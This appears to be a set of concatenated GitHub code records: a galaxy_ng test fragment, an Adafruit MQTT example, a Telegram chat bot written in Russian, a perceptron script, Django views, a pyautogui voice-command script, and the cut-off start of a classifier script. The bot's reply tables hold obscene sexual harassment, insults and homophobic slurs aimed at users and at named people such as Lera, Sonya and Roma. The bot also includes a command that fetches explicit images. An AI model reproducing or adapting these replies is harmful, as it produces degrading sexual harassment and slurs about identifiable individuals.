porta augue id velit euismod, elementum vehicula \"\n \"neque volutpat. Donec ac urna at purus commodo laoreet. Nulla egestas \"\n \"imperdiet tincidunt. Morbi consequat egestas est accumsan eleifend. \"\n \"Pellentesque cursus interdum metus, eget consequat sapien convallis \"\n \"vitae. Integer sit amet aliquet turpis. Etiam risus lacus, viverra \"\n \"quis velit et, efficitur aliquam enim. Vivamus eu turpis et diam \"\n \"ultrices mollis.\\n\\n\"\n \"Mauris finibus tortor eget condimentum mollis. Etiam non ipsum ut \"\n \"metus venenatis faucibus. Ut tempor lacus sed ipsum fermentum maximus. \"\n \"Nunc fringilla rhoncus turpis eget placerat. Integer scelerisque pretium\"\n \" porttitor. Etiam quis vulputate mauris. Ut ultrices nisl a aliquet \"\n \"convallis. Nam bibendum purus tortor, et lacinia eros maximus a. Quisque \"\n \"euismod sapien nunc, in auctor eros blandit id. Proin pretium hendrerit \"\n \"augue, non sagittis dolor rhoncus a. Nullam vel est vel neque scelerisque\"\n \" condimentum. Integer efficitur ex eu augue laoreet, ut volutpat velit \"\n \"volutpat. Morbi id arcu sed dolor tincidunt pulvinar ac sed sem. Mauris \"\n \"posuere neque velit.\\n\\n\"\n \"Curabitur ultricies odio leo, hendrerit interdum felis semper ut. Aliquam\"\n \" eleifend leo quis ante faucibus tincidunt. In porttitor, quam nec molestie\"\n \" convallis, tortor ante ultricies arcu, et semper ligula sem quis enim. \"\n \"Nullam eleifend eros vitae mi luctus, in pellentesque nibh consequat. \"\n \"Curabitur magna risus, dignissim a convallis non, semper eu enim. \"\n \"Suspendisse vulputate sapien diam, in semper nulla fermentum at. Ut \"\n \"interdum sollicitudin suscipit. Etiam tempus ultrices ante, at sodales \"\n \"eros blandit vitae. Nulla facilisi. Nullam id vulputate quam, vel sagittis \"\n \"tortor. Vestibulum dolor mauris, lobortis sit amet justo rutrum, scelerisque \"\n \"iaculis purus. Pellentesque pharetra imperdiet erat, vitae vestibulum ipsum \"\n \"commodo eu. Donec tristique tortor tempor orci convallis finibus. Integer \"\n \"nec sagittis lectus. In ullamcorper laoreet nunc, quis mattis neque commodo \"\n \"in. Vestibulum eu risus sapien.\\n\\n\"\n ),\n }\n\n ns = crc_client(\n \"v3/namespaces/ansible/\",\n args=ns_data,\n method=\"PUT\",\n )\n\n clear_certified(pah_client)\n\n perform_sync(pah_client, crc_config)\n _assert_namespace_sync(pah_client, crc_client, ns)\n\n # update the namespace and sync again to verify that the new changes are\n # pulled down\n ns = crc_client(\n \"v3/namespaces/ansible/\",\n args={\n **ns_data,\n \"description\": \"foo\",\n \"avatar_url\": \"https://avatars.githubusercontent.com/u/1507452\"\n }\n )\n\n perform_sync(pah_client, crc_config)\n _assert_namespace_sync(pah_client, crc_client, ns)\n","repo_name":"ansible/galaxy_ng","sub_path":"galaxy_ng/tests/integration/api/test_certified_sync.py","file_name":"test_certified_sync.py","file_ext":"py","file_size_in_byte":10864,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"72"} +{"seq_id":"15622370681","text":"import board\nimport busio\nfrom digitalio import DigitalInOut\nimport neopixel\nfrom adafruit_esp32spi import adafruit_esp32spi\nfrom adafruit_esp32spi import adafruit_esp32spi_wifimanager\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\n\nimport adafruit_minimqtt.adafruit_minimqtt as MQTT\n\n### WiFi ###\n\n# Get wifi details and more from a secrets.py file\ntry:\n from secrets import secrets\nexcept ImportError:\n print(\"WiFi secrets are kept in secrets.py, please add them there!\")\n raise\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\n# If you have an externally connected ESP32:\n# esp32_cs = DigitalInOut(board.D9)\n# esp32_ready = DigitalInOut(board.D10)\n# esp32_reset = DigitalInOut(board.D5)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\"\"\"Use below for Most Boards\"\"\"\nstatus_light = neopixel.NeoPixel(\n board.NEOPIXEL, 1, brightness=0.2\n) # Uncomment for Most Boards\n\"\"\"Uncomment below for ItsyBitsy M4\"\"\"\n# status_light = dotstar.DotStar(board.APA102_SCK, board.APA102_MOSI, 1, brightness=0.2)\n# Uncomment below for an externally defined RGB LED\n# import adafruit_rgbled\n# from adafruit_esp32spi import PWMOut\n# RED_LED = PWMOut.PWMOut(esp, 26)\n# GREEN_LED = PWMOut.PWMOut(esp, 27)\n# BLUE_LED = PWMOut.PWMOut(esp, 25)\n# status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)\nwifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)\n\n### Topic Setup ###\n\n# MQTT Topic\n# Use this topic if you'd like to connect to a standard MQTT broker\nmqtt_topic = \"test/topic\"\n\n# Adafruit IO-style Topic\n# Use this topic if you'd like to connect to io.adafruit.com\n# mqtt_topic = 'aio_user/feeds/temperature'\n\n### Code ###\n\n\n# Define callback methods which are called when events occur\n# pylint: disable=unused-argument, redefined-outer-name\ndef connect(client, userdata, flags, rc):\n # This function will be called when the client is connected\n # successfully to the broker.\n print(\"Connected to MQTT Broker!\")\n print(\"Flags: {0}\\n RC: {1}\".format(flags, rc))\n\n\ndef disconnect(client, userdata, rc):\n # This method is called when the client disconnects\n # from the broker.\n print(\"Disconnected from MQTT Broker!\")\n\n\ndef subscribe(client, userdata, topic, granted_qos):\n # This method is called when the client subscribes to a new feed.\n print(\"Subscribed to {0} with QOS level {1}\".format(topic, granted_qos))\n\n\ndef unsubscribe(client, userdata, topic, pid):\n # This method is called when the client unsubscribes from a feed.\n print(\"Unsubscribed from {0} with PID {1}\".format(topic, pid))\n\n\ndef publish(client, userdata, topic, pid):\n # This method is called when the client publishes data to a feed.\n print(\"Published to {0} with PID {1}\".format(topic, pid))\n\n\n# Get certificate and private key from a certificates.py file\ntry:\n from certificates import DEVICE_CERT, DEVICE_KEY\nexcept ImportError:\n print(\n \"Certificate and private key data is kept in certificates.py, please add them there!\"\n )\n raise\n\n# Set Device Certificate\nesp.set_certificate(DEVICE_CERT)\n\n# Set Private Key\nesp.set_private_key(DEVICE_KEY)\n\n# Connect to WiFi\nprint(\"Connecting to WiFi...\")\nwifi.connect()\nprint(\"Connected!\")\n\n# Initialize MQTT interface with the esp interface\nMQTT.set_socket(socket, esp)\n\n# Set up a MiniMQTT Client\nclient = MQTT.MQTT(\n broker=secrets[\"broker\"], username=secrets[\"user\"], password=secrets[\"pass\"]\n)\n\n# Connect callback handlers to client\nclient.on_connect = connect\nclient.on_disconnect = disconnect\nclient.on_subscribe = subscribe\nclient.on_unsubscribe = unsubscribe\nclient.on_publish = publish\n\nprint(\"Attempting to connect to %s\" % client.broker)\nclient.connect()\n\nprint(\"Subscribing to %s\" % mqtt_topic)\nclient.subscribe(mqtt_topic)\n\nprint(\"Publishing to %s\" % mqtt_topic)\nclient.publish(mqtt_topic, \"Hello Broker!\")\n\nprint(\"Unsubscribing from %s\" % mqtt_topic)\nclient.unsubscribe(mqtt_topic)\n\nprint(\"Disconnecting from %s\" % client.broker)\nclient.disconnect()\n","repo_name":"adafruit/Adafruit_CircuitPython_MiniMQTT","sub_path":"examples/esp32spi/minimqtt_certificate_esp32spi.py","file_name":"minimqtt_certificate_esp32spi.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"70037863272","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport random\nimport telebot\nimport time\n\nfrom bs4 import BeautifulSoup\nfrom urllib import request\n\n# Create an object of a bot\nbot = telebot.TeleBot(\"TOKEN\")\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\nbot_names = ['Вася', 'вася', 'Васёк', 'васёк', 'Васек', 'васек', 'Васька', 'васька', 'Василий', 'василий', 'Васе',\n 'васе', 'Васю', 'васю', 'Васи', 'васи', 'Вась', 'вась', 'Ваське', 'ваське', 'Ваську', 'ваську', 'Василию',\n 'василию', 'Vasek', 'vasek', 'VASEK', 'ВАСИЛИЮ', 'ВАСЯ', 'ВАСЁК', 'ВАСЕК', 'ВАСЬКА', 'ВАСИЛИЙ', 'ВАСЕ',\n 'ВАСЮ', 'ВАСИ', 'ВАСЬ', 'ВАСЬКЕ', 'ВАСЬКУ']\n\nactivity_words = ['Что делаешь', 'что делаешь', 'Чё делаешь', 'чё делаешь', 'Че делаешь', 'че делаешь', 'Чо делаешь',\n 'чо делаешь', 'Шо делаешь', 'шо делаешь', 'Што делаешь', 'што делаешь', 'Чем занят', 'чем занят',\n 'Чё мутишь', 'чё мутишь', 'Че мутишь', 'че мутишь', 'Шо мутишь', 'шо мутишь', 'как ты там',\n 'как ты там', 'там у тебя', 'ЧЕМ ЗАНЯТ', 'ЧТО ДЕЛАЕШЬ', 'ЧЕ ДЕЛАЕШЬ', 'ЧО ДЕЛАЕШЬ', 'ШО ДЕЛАЕШЬ',\n 'ШТО ДЕЛАЕШЬ', 'ШО МУТИШЬ']\n\ngoodbye_words = ['Пока', 'пока', 'Споки', 'споки', 'Спочки', 'спочки', 'Спокойной ночи', 'спокойной ночи', 'ПОКА']\n\nhello_words = ['Привет', 'привет', 'Здарова', 'здарова', 'Хай', 'хай', 'Салют', 'салют', 'ПРИВЕТ', 'ЗДАРОВА', 'ХАЙ']\n\nmood_words = ['Как дела', 'как дела', 'Как настроение', 'как настроение', 'Как у тебя дела', 'как у тебя дела',\n 'Как у тебя настроение', 'как у тебя настроение', 'Че как', 'че как', 'Че каво', 'че каво', 'Как ты',\n 'как ты', 'Как поживаешь', 'как поживаешь', 'КАК ПОЖИВАЕШЬ', 'КАК ДЕЛА', 'КАК НАСТРОЕНИЕ', 'ЧО КАК']\n\nrandom_words = ['Скажи', 'скажи', 'скажешь', 'Что ещё', 'что ещё', 'Шо ещё', 'шо ещё', 'Чё ещё', 'чё ещё', 'Чо ещё',\n 'чо ещё', 'Что-нибудь', 'что-нибудь', 'Шо недь', 'шо недь', 'Што-нибудь', 'што-нибудь', 'Че-недь',\n 'че-недь', 'Чё недь', 'чё недь', 'Чо недь', 'чо недь', 'Шо нибудь', 'шо нибудь', 'Што-недь', 'што-недь',\n 'ЧО НЕДЬ', 'ШО НИБУДЬ']\n\nrude_words = ['Хуй', 'хуй', 'Соси', 'соси', 'Пид', 'пид', 'Лох', 'лох', 'Тупой', 'тупой', 'Тупица', 'тупица', 'Уёб',\n 'уёб', 'Уеб', 'уеб', 'Даун', 'даун', 'Сука', 'сука', 'Пизд', 'пизд', 'Сосать', 'сосать', 'Придурок',\n 'придурок', 'Идиот', 'идиот', 'Чмо', 'чмо', 'Чёрт', 'чёрт', 'Черт', 'черт', 'Долбо', 'долбо', 'Ублюдок',\n 'ублюдок', 'Суч', 'суч', 'Гнида', 'гнида', 'Шлю', 'шлю', 'Гондон', 'гондон']\n\nwhy_words = ['Почему', 'почему', 'А что так', 'а что так', 'А чё так', 'а чё так', 'А шо так', 'а шо так', 'Зачем',\n 'зачем', 'Нахуя', 'нахуя', 'Нахрен', 'нахрен']\n\npetrovich_answers = {0: 'сука хачу питровича!', 1: 'хочу бухать суки', 2: 'дай мне питровича падла)))', 3: 'хочу суку',\n 4: 'дайти водяры суки', 5: 'пошли бухать питровича детка))))'}\n\nartem_words = ['Артём', 'артём', 'Артем', 'артем', 'Тёма', 'тёма']\nilya_words = ['Илья', 'илья', 'Илюша', 'илюша', 'Илье', 'илье', 'Илью', 'илью']\nlera_words = ['Лера', 'лера', 'Лерк', 'лерк', 'Леру', 'леру', 'Лере', 'лере']\nroman_words = ['Рома', 'рома', 'Ромо', 'ромо']\nsonya_words = ['Соня', 'соня', 'Соньк', 'соньк', 'Соню', 'соню', 'Соне', 'соне']\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\nactivity_answers = {0: 'сижу общаюсь с тобой че не видеш', 1: 'сую хуй тебе в рот))))', 2: 'играю в гта крмпэшку',\n 3: 'тараню твой рот балтом', 4: 'общаюсь с соской кокойто', 5: 'пирданул в нос тебе а что????',\n 6: 'слушай мне не до тебя говори чё хочеш', 7: 'ща подожди одаааа сука пёрнул в тебя', 8: 'хаваю',\n 9: 'ем огурец а чё', 10: 'пишу тебе в телеграме идиотина', 11: 'бухаю пивас', 12: 'смотрю телик',\n 13: 'дрочу и ща кончю на тебя оооо дааааа суааааааа'}\n\ngoodbye_answers = {0: 'аливидерчи)))', 1: 'ага', 2: 'гудбай лошара)', 3: 'пиздуй))', 4: 'адиос амигос сука подсасывай',\n 5: 'пака и подпишись на канал сучка)))', 6: 'прощай', 7: 'вали подальше', 8: 'вот и идика ты нахуй',\n 9: 'пока но наа даче будет жара када ебать тя буду', 10: '66', 11: 'смари не падавись моим шлангом',\n 12: 'пока машка))))', 13: 'до встречи с моим членам'}\n\nhello_answers = {0: 'здарово', 1: 'ну привет', 2: 'хай сука))', 3: 'ага', 4: 'гутэнтак)))', 5: 'банжур епта', 6: 'хай',\n 7: 'салют сучька!)', 8: 'здраствуйте', 9: 'привет соска', 10: 'привет бот)))', 11: 'хай и саси сразу',\n 12: 'хочеш общаца? давай сука', 13: 'базарь'}\n\nmood_answers = {0: 'нормальна. а че те?', 1: 'хуёва', 2: 'зоебись))', 3: 'так се', 4: 'норма', 5: 'тя не ебать должно',\n 6: 'нормас хочу трахаца в троём я лерка сонька)))))', 7: 'а вот так что у тебя весь рот в моей сперми',\n 8: 'как ты думаеш когда у меня хуй большой те в рот не влезет??', 9: 'по жопе бы те надавать сучбка))',\n 10: 'ща покажу те свой хуй узнаеш', 11: 'отсоси узнаеш', 12: 'а щто хочешь от меня?', 13: 'хз бля чёте',\n 14: 'неебу дальше што', 15: 'вс отлично вчера леру трахнул хорошо было стонала сука)))'}\n\nrandom_answers = {0: 'я люблю лерку но эта сучка меня не любет', 1: 'соню выдрать хочеца очень))',\n 2: 'рома пидафил ебаный бородатый черт саси хуй', 3: 'артем питух соси', 4: 'илья лох я те ёбну',\n 5: 'хз чё расказать. го на сервак я тя админом сделаю))))))', 6: 'када бухать суки на дачю', 7: 'пнх',\n 8: 'ниче не хочу говорить иди нахуй', 9: 'если никитос еще раз будет пиздить я ево ушатаю суку',\n 10: 'подпишись https://www.youtube.com/channel/UCV0XK4xmltqmn5tY6by4NbA', 11: 'соси болт сучка)))',\n 12: 'яне насрать под губу с насваем пусть сасет дальше', 13: 'кто хочет сасать давай иди сюда сука',\n 14: 'нах ваш ебаный телеграмм'}\n\nrude_answers = {0: 'иди нахуй сука', 1: 'саси', 2: 'ты шлюшка тупая отсаси мой хуй', 3: 'ты сука отсоси мой болт',\n 4: 'отсоси мне', 5: 'сучка я тя ушатаю', 6: 'завали ебала сука', 7: 'заткнись', 8: 'прососи хуй дура',\n 9: 'я тя уебу падлюка', 10: 'ты сука тупая пошла нахуй тварь', 11: 'я твой хуй разработаю лох',\n 12: 'соска рот закрой', 13: 'понюхай очко моё сучара', 14: 'смотри сюда --------> соси', 15: 'ди на',\n 16: 'чё срака красная? иди проспись', 17: 'пошла нахуй', 18: 'давай едь на дачу я тебя ебать буду',\n 19: 'иди сюда я те пасасать дам', 20: 'ехай нахуй'}\n\nwhat_answers = {0: 'че?', 1: 'хули надо', 2: 'ну?', 3: 'че те блять', 4: '?', 5: 'чо сука', 6: 'саси ево 3====э',\n 7: 'ш��о хотела сучька?', 8: 'ты мне бля', 9: 'да', 10: 'што', 11: 'ну пизди тока хуй высунь изо рта',\n 12: 'говори дальше сука', 13: 'жду', 14: 'я тут есличё'}\n\nwhy_answers = {0: 'хуй ево знает я занет атвали)))', 1: 'незнаю', 2: 'не ебу', 3: 'я не в настраении отвачать',\n 4: 'потомучьто ты прососка)', 5: 'шоб ты спросила', 6: 'я уебок наверна', 7: 'просто', 8: 'хз иди нах',\n 9: 'хз', 10: 'понятья неимею', 11: 'какая тибе разница', 12: 'тя не ибёт', 13: 'саси а не спрашивай))',\n 14: 'давай саси не останавливайся'}\n\n# rude_answers5 = {0: '', 1: '', 2: '', 3: '', 4: '', 5: '', 6: '', 7: '', 8: '', 9: '', 10: '', 11: '', 12: '', 13: ''}\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n# гей дон гондон протаранить рот ну сучька давай давай сделай это\n\n\n# Bot hello messages\ndef say_hello(message):\n for word in hello_words:\n if word in message.text:\n bot.send_message(message.chat.id, hello_answers[random.randrange(0, len(hello_answers))])\n return 0\n\n\n# Bot mood messages\ndef say_mood(message):\n for word in mood_words:\n if word in message.text:\n bot.send_message(message.chat.id, mood_answers[random.randrange(0, len(mood_answers))])\n return 0\n\n\n# Bot activity messages\ndef say_activity(message):\n for word in activity_words:\n if word in message.text:\n bot.send_message(message.chat.id, activity_answers[random.randrange(0, len(activity_answers))])\n return 0\n\n\n# Bot goodbye messages\ndef say_goodbye(message):\n for word in goodbye_words:\n if word in message.text:\n bot.send_message(message.chat.id, goodbye_answers[random.randrange(0, len(goodbye_answers))])\n return 0\n\n\n# Bot why messages\ndef say_why(message):\n for word in why_words:\n if word in message.text:\n bot.send_message(message.chat.id, why_answers[random.randrange(0, len(why_answers))])\n return 0\n\n\n# Bot respond messages\ndef say_what(message):\n bot.send_message(message.chat.id, what_answers[random.randrange(0, len(what_answers))])\n return 0\n\n\n# Bot rude messages\ndef say_swearword(message):\n for word in rude_words:\n if word in message.text:\n bot.send_message(message.chat.id, rude_answers[random.randrange(0, len(rude_answers))])\n return 0\n\n\n# Bot tells his thoughts\ndef say_something(message):\n for word in random_words:\n if word in message.text:\n bot.send_message(message.chat.id, random_answers[random.randrange(0, len(random_answers))])\n return 0\n\n\n''' ---------------------------------------------------------------------------------------------------------------- '''\n\n\n# Command 'help' handling\n@bot.message_handler(commands=['help'])\ndef help_message(message):\n msg = '''\n*************************\n****** Vasek Bot v1.2 ******\n*************************\n \n Список команд:\n /help - вызов окна поддержки\n /start, /test - приветственное сообщение\n /time - информация о времени\n /tits - отправить сиськи\n\n Заметки:\n > Vasek является аппроксимированной копией блогера и геймера Василия Придатченко из клана SKK\n \n > Vasek не реагирует на сообщения, в которых не упоминается его имя (почти)\n\n > Vasek не всегда адекватен, поэтому не стоит на него злиться... но и злить его тоже не стоит :)\n\n > Vasek может стать лучше благодаря вам, так что предлагайте свои идеи по его усовершенствованию\n\n (с) Eugen Crack\n'''\n bot.send_message(message.chat.id, msg)\n\n\n# Command 'start' and 'test' handling\n@bot.message_handler(commands=['start', 'test'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'я тут')\n\n\n# Command 'time' handling\n@bot.message_handler(commands=['time'])\ndef time_message(message):\n summer_days = 92\n today = datetime.date.today()\n next_year = today.year + 1\n\n last_summer_day = datetime.date(today.year, 9, 1)\n new_year_day = datetime.date(next_year, 1, 1)\n boys_day = datetime.date(next_year, 2, 23)\n girls_day = datetime.date(next_year, 3, 8)\n win_day = datetime.date(next_year, 5, 9)\n rus_day = datetime.date(next_year, 6, 12)\n artem_day = datetime.date(next_year, 1, 5)\n ilya_day = datetime.date(next_year, 2, 23)\n lera_day = datetime.date(next_year, 3, 5)\n nikita_day = datetime.date(next_year, 6, 17)\n roman_day = datetime.date(next_year, 3, 8)\n# sonya_day = datetime.date(next_year, 1, 1) # ?????\n vasya_day = datetime.date(next_year, 1, 3)\n yana_day = datetime.date(next_year, 5, 15)\n\n diff_summer = last_summer_day - today\n diff_new_year = new_year_day - today\n diff_boys = boys_day - today\n diff_girls = girls_day - today\n diff_win = win_day - today\n diff_rus = rus_day - today\n diff_artem = artem_day - today\n diff_ilya = ilya_day - today\n diff_lera = lera_day - today\n diff_nikita = nikita_day - today\n diff_roman = roman_day - today\n diff_sonya = today - today\n diff_vasya = vasya_day - today\n diff_yana = yana_day - today\n\n msg = '''\nСегодня {}\nПроёбано {} дней лета... осталось {}\n----------------------------------------------------------\n > Новый год через {}д\n > День пацанов через {}д\n > День тёлок через {}д\n > Деды победят через {}д\n > День России через {}д\n----------------------------------------------------------\n > День рождения Артёма через {}д\n > День рождения Васи через {}д\n > День рождения Ильи через {}д\n > День рождения Леры через {}д\n > День рождения Никиты через {}д\n > День рождения Романа через {}д\n > День рождения Сони через {}д\n > День рождения Яны через {}д\n'''.format(today.strftime('%d.%m.%Y'), summer_days - diff_summer.days, diff_summer.days, diff_new_year.days,\n diff_boys.days, diff_girls.days, diff_win.days, diff_rus.days, diff_artem.days, diff_vasya.days,\n diff_ilya.days, diff_lera.days, diff_nikita.days, diff_roman.days, diff_sonya.days, diff_yana.days)\n bot.send_message(message.chat.id, msg)\n\n\n# Command 'tits' handling\n@bot.message_handler(commands=['tits'])\ndef tits_message(message):\n url = 'http://boobs-selfshots.tumblr.com/random'\n resp = request.urlopen(url)\n html = resp.read()\n parser = BeautifulSoup(html, 'html.parser')\n tag = parser.find_all('div', {'class': 'photo_post'})[0].a\n\n if tag is not None:\n img = tag.img\n else:\n img = parser.find_all('div', {'class': 'photo_post'})[0].img\n\n link = img['src']\n bot.send_message(message.chat.id, link)\n\n\n# Received message handling, 'sleep' for a little delay before answering\n@bot.message_handler(content_types=['text'])\ndef check_message(message):\n if 'петрович' in message.text or 'питрович' in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, petrovich_answers[random.randrange(0, len(petrovich_answers))])\n return\n\n # ~10% chance to do that block\n if random.randrange(0, 10) == 5:\n for artem in artem_words:\n if artem in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'артем питух)))')\n return\n\n for ilya in ilya_words:\n if ilya in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'илья олкаш ебаный)')\n return\n\n for lera in lera_words:\n if lera in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'я люблю и хочю лерку')\n return\n\n for roman in roman_words:\n if roman in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'рома это пидар)))')\n return\n\n for sonya in sonya_words:\n if sonya in message.text:\n time.sleep(random.randrange(3, 7))\n bot.send_message(message.chat.id, 'я хочю потрахаца с соней)))')\n return\n\n for name in bot_names:\n if name in message.text:\n time.sleep(random.randrange(3, 7))\n\n # Greetings!\n if say_hello(message) == 0:\n break\n\n # How r u?\n if say_mood(message) == 0:\n break\n\n # Why?\n if say_why(message) == 0:\n break\n\n # Wut r u doing?\n if say_activity(message) == 0:\n break\n\n # Say something!\n if say_something(message) == 0:\n break\n\n # Rude words\n if say_swearword(message) == 0:\n break\n\n # Good bye\n if say_goodbye(message) == 0:\n break\n\n # Bot responds\n if say_what(message) == 0:\n break\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","repo_name":"insotriplesix/dp","sub_path":"bots/telegram/vasek/src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":20065,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"25641364359","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Perceptron import Perceptron\n\ntraining = pd.read_csv('dados/dados_2D_parabola.csv')\n\ntraining_x = training['x'].to_numpy()\ntraining_y = training['y'].to_numpy()\nlabels = training['classificacao'].to_numpy()\n\n\nx = np.array(training_x)\ny = np.array(training_y) \n\nperceptron = Perceptron(201)\n\n\nperceptron.train(y, labels)\n\n##perceptron.train(training_inputs, labels)\n\nperceptron.predict(x)\n\n\nperceptron.data_plot(x, y, 201)\n\nperceptron.write_result()","repo_name":"RaulLima2/Perceptron-with-Python","sub_path":"perceptron with one layer/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41785380437","text":"from django import http\nfrom django.core.files.base import File\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import redirect, render\n\nfrom rest_framework import viewsets\nfrom .serializers import ProductSerializer\nfrom .models import Product,Category,Image\nfrom .forms import CreateProduct, UpdateImage\n\nfrom io import BytesIO\nfrom django.core.files.storage import FileSystemStorage\n\nfrom django.http import JsonResponse, request\nfrom django.core import serializers\nimport json\nfrom django.forms import modelformset_factory\n\nclass ProductView(viewsets.ModelViewSet):\n serializer_class = ProductSerializer\n queryset = Product.objects.all()\n# Create your views here.\n\ndef create(request):\n\n if request.method == \"GET\":\n categories=Category.objects.filter(depth=0)\n form=CreateProduct()\n\n return render(request,'create.html',{'form':form,'categories':categories})\n\n\n if request.method == \"POST\":\n form=CreateProduct(data=request.POST, files=request.FILES)\n \n\n specs=json.loads(request.POST[\"json-specs\"])\n ##print(specs)\n \n\n\n if form.is_valid():\n new=form.save()\n # ##print(f'FILES----------------------{request.FILES.getlist('images')}')\n fs = FileSystemStorage()\n print(request.FILES.getlist('images'))\n for image in request.FILES.getlist('images'):\n \n filename = fs.save(image.name, image)\n new.image_set.create(image=filename)\n for key in specs:\n ##print(key, '->', specs[key])\n new.spec_set.create(name=key, spec=specs[key])\n\n\n ##print(form.instance.pk)\n return redirect('index')\n else:\n ##print (f'form: {form.errors[\"category\"]}')\n return render(request,'create.html',{'form':form,'categories':Category.objects.filter(depth=0)})\n\n\n\n\ndef update_product(request, pk):\n product=Product.objects.get(pk=pk)\n images=product.image_set.all()\n categories=[]\n categories_temp=[]\n category=product.category\n images_initial=[]\n UpdateImageFormset=modelformset_factory(\n Image,form=UpdateImage,can_delete=True)\n while True:\n #print(f\"loop{category.depth} {category.name}\")\n if category.depth !=0:\n parent=Category.objects.get(pk=category.parentPk.pk)\n categories_temp=Category.objects.filter(depth=category.depth).filter(parentPk=parent)\n \n categories.insert(0,categories_temp)\n category=parent\n else:\n categories_temp=Category.objects.filter(depth=category.depth)\n categories.insert(0,categories_temp)\n break\n\n \n \n\n\n if request.method == \"GET\":\n initial_dict={\n \"name\": product.name,\n \"description\":product.description,\n \"detail\":product.detail,\n \"price\":product.price,\n \"stock\":product.stock,\n \"category\":product.category,\n \"highlighted\":product.highlighted,\n \"new\":product.new,\n \"main_image\":product.main_image\n\n\n\n\n }\n \n form=CreateProduct(initial=initial_dict)\n\n formset_images=UpdateImageFormset(queryset=images,prefix='images')\n #print(formset_images)\n return render(request,'update.html',{'form':form,'form_images':formset_images,\"categories\":categories})\n\n if request.method == \"POST\":\n forms=[]\n\n form=CreateProduct(data=request.POST, files=request.FILES,instance=product)\n \n\n form_images=UpdateImageFormset(data=request.POST, files=request.FILES,prefix='images')\n \n \n if form.is_valid() and form_images.is_valid():\n new=form.save()\n for form in form_images:\n \n form.save()\n \n fs = FileSystemStorage()\n for image in request.FILES.getlist('images'):\n \n filename = fs.save(image.name, image)\n new.image_set.create(image=filename)\n\n \n return redirect('index')\n else:\n return render(request,'update.html',{'form':form,'form_images':form_images,'categories':Category.objects.filter(depth=0)})\n\n\n\ndef ajax_delete_image(request):\n pk=request.GET.get(\"pk\",None)\n print(pk)\n Image.objects.get(pk=int(pk)).delete()\n return HttpResponse(\"sucess\")\n\ndef ajax_delete_product(request):\n pk=request.GET.get(\"pk\",None)\n \n Product.objects.get(pk=int(pk)).delete()\n return HttpResponse(\"sucess\")\n\n \n\n\ndef load_categories(request):\n \n ###print(\"load categories\")\n\n\n\n categoriesHtml=[]\n categoriesAll=[]\n category_id = request.GET.get('category')\n \n \n category=Category.objects.get(id=category_id)\n \n categories=Category.objects.filter(parentPk=category)\n\n\n ##print(categories)\n\n return JsonResponse(serializers.serialize('python', categories),safe=False)","repo_name":"tfcl/albiclick","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26916507657","text":"import pyautogui\nimport os\nimport time\n\n\ndef convert_command(command):\n if \"start simulation\" in command:\n return \"mpirun -n 1 ~parafem/p121 p121-demo\"\n elif \"stop simulation\" in command:\n return \"putsa\"\n elif \"increase stiffness\" in command:\n return \"villous\"\n else:\n return \"error\"\n\npath = '/Users/alexbrown/Desktop/Vosk/vosk-api/python/example/listfile.txt'\nlast_updated = os.path.getctime(path)\nfirst = True\nf = open(\"listfile.txt\", \"r\")\ntime.sleep(3)\nwhile True:\n c_time = os.path.getctime(path)\n\n if not first:\n if c_time == last_updated:\n print(\"no change\")\n else:\n print(\"change\")\n f = open(\"listfile.txt\", \"r\")\n last_updated = c_time\n line = f.readline()\n if not line:\n break\n fortran_command = convert_command(line.lower().strip())\n print(\"new command = \" + fortran_command)\n if fortran_command == \"error\":\n continue\n else:\n pyautogui.write(fortran_command)\n pyautogui.press('enter')\n elif first:\n first = False\n line = f.readline()\n if not line:\n break\n fortran_command = convert_command(line.lower().strip())\n pyautogui.write(fortran_command)\n pyautogui.press('enter')\n f.close()\n time.sleep(2)\n\n \n \n \n \n\n","repo_name":"alexbrown98/MikeVosk","sub_path":"example/test_scripts.py","file_name":"test_scripts.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144656232","text":"'''\nbuil a DNN model to distinguish horse and human\ndata source:\nwget --no-check-certificate https://storage.googleapis.com/laurencemoroney-blog.appspot.com/horse-or-human.zip -O /tmp/horse-or-human.zip\n'''\n\nimport os\nimport zipfile\n\nprint(\"extracing horse-or-human.zip...\")\nlocal_zip = \"./tmp/horse-or-human.zip\"\nzip_ref = zipfile.ZipFile(local_zip, 'r')\nzip_ref.extractall(\"./tmp/horse-or-human\")\nzip_ref.close()\nprint(\"./tmp/horse-or-human/horse and 